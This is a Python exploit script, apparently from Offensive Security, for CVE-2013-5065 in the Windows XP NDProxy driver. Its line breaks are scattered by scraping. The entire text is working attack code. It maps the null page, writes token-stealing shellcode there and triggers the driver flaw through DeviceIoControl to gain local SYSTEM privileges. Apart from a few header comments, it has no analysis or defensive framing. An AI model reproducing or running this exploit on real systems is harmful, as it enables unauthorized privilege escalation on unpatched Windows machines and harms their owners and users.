# NDPROXY Local SYSTEM privilege escalation
# http://www.offensive-security.com
# Tested on Windows XP SP3
# http://www.offensive-security.com/vulndev/ndproxy-local-system-exploit-cve-2013-5065/
# Original crash ... null pointer dereference
# Access violation - code c0000005 (!!! second chance !!!)
# 00000038 ?? ???
from
ctypes
import
*
from
ctypes.wintypes
import
*
import
os, sys
kernel32
=
windll.kernel32
ntdll
=
windll.ntdll
GENERIC_READ
=
0x80000000
GENERIC_WRITE
=
0x40000000
FILE_SHARE_READ
=
0x00000001
FILE_SHARE_WRITE
=
0x00000002
NULL
=
0x0
OPEN_EXISTING
=
0x3
PROCESS_VM_WRITE
=
0x0020
PROCESS_VM_READ
=
0x0010
MEM_COMMIT
=
0x00001000
MEM_RESERVE
=
0x00002000
MEM_FREE
=
0x00010000
PAGE_EXECUTE_READWRITE
=
0x00000040
PROCESS_ALL_ACCESS
=
2097151
FORMAT_MESSAGE_FROM_SYSTEM
=
0x00001000
baseadd
=
c_int(
0x00000001
)
MEMRES
=
(
0x1000
|
0x2000
)
MEM_DECOMMIT
=
0x4000
PAGEEXE
=
0x00000040
null_size
=
c_int(
0x1000
)
STATUS_SUCCESS
=
0
def
log(msg):
print
msg
def
getLastError():
"""[-] Format GetLastError"""
buf
=
create_string_buffer(
2048
)
if
kernel32.FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL,
kernel32.GetLastError(),
0
,
buf, sizeof(buf), NULL):
log(buf.value)
else
:
log(
"[-] Unknown Error"
)
print
"[*] Microsoft Windows NDProxy CVE-2013-5065 0day"
print
"[*] Vulnerability found in the wild"
print
"[*] Coded by Offensive Security"
tmp
=
(
"\x00"
*
4
)
*
5
+
"\x25\x01\x03\x07"
+
"\x00"
*
4
+
"\x34\x00\x00\x00"
+
"\x00"
*
(
84
-
24
)
InBuf
=
c_char_p(tmp)
dwStatus
=
ntdll.NtAllocateVirtualMemory(
0xFFFFFFFF
, byref(baseadd),
0x0
, byref(null_size), MEMRES, PAGEEXE)
if
dwStatus !
=
STATUS_SUCCESS:
print
"[+] Something went wrong while allocating the null paged memory: %s"
%
dwStatus
getLastError()
written
=
c_ulong()
sh
=
"\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x44\x8B\xC8\x8B\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x83\xB8\x84\x00\x00\x00\x04\x75\xEC\x8B\x90\xC8\x00\x00\x00\x89\x91\xC8\x00\x00\x00\xC3"
sc
=
"\x90"
*
0x38
+
"\x3c\x00\x00\x00"
+
"\x90"
*
4
+
sh
+
"\xcc"
*
(
0x400
-
0x3c
-
4
-
len
(sh))
alloc
=
kernel32.WriteProcessMemory(
0xFFFFFFFF
,
0x00000001
, sc,
0x400
, byref(written))
if
alloc
=
=
0
:
print
"[+] Something went wrong while writing our junk to the null paged memory: %s"
%
alloc
getLastError()
dwRetBytes
=
DWORD(
0
)
DEVICE_NAME
=
"\\\\.\\NDProxy"
hdev
=
kernel32.CreateFileA(DEVICE_NAME,
0
,
0
,
None
, OPEN_EXISTING ,
0
,
None
)
if
hdev
=
=
-
1
:
print
"[-] Couldn't open the device... :("
sys.exit()
kernel32.DeviceIoControl(hdev,
0x8fff23cc
, InBuf,
0x54
, InBuf,
0x24
, byref(dwRetBytes),
0
)
kernel32.CloseHandle(hdev)
print
"[+] Spawning SYSTEM Shell..."